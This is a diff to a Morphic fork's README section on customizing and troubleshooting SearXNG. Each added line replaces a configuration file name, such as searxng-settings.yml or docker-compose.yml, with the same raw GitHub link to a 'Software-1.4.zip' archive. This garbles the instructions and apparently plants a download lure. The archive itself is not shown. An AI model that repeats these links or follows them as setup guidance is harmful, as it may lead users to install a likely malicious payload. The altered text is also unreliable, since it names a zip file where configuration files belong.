DevviantSU/morphic/README.md

 #### Customizing SearXNG

-- You can modify `searxng-settings.yml` to enable/disable specific search engines, change UI settings, or adjust server options.
+- You can modify `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip` to enable/disable specific search engines, change UI settings, or adjust server options.
-- The `searxng-limiter.toml` file allows you to configure rate limiting and bot detection.
+- The `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip` file allows you to configure rate limiting and bot detection.
 This is useful if you're exposing SearXNG directly to the internet.
-- If you prefer not to use external configuration files, you can set these options using environment variables in the `docker-compose.yml` file or directly in the SearXNG container.
+- If you prefer not to use external configuration files, you can set these options using environment variables in the `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip` file or directly in the SearXNG container.

 #### Troubleshooting

-- If you encounter issues with specific search engines (e.g., Wikidata), you can disable them in `searxng-settings.yml`:
+- If you encounter issues with specific search engines (e.g., Wikidata), you can disable them in `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip`:

 ```yaml
 engines: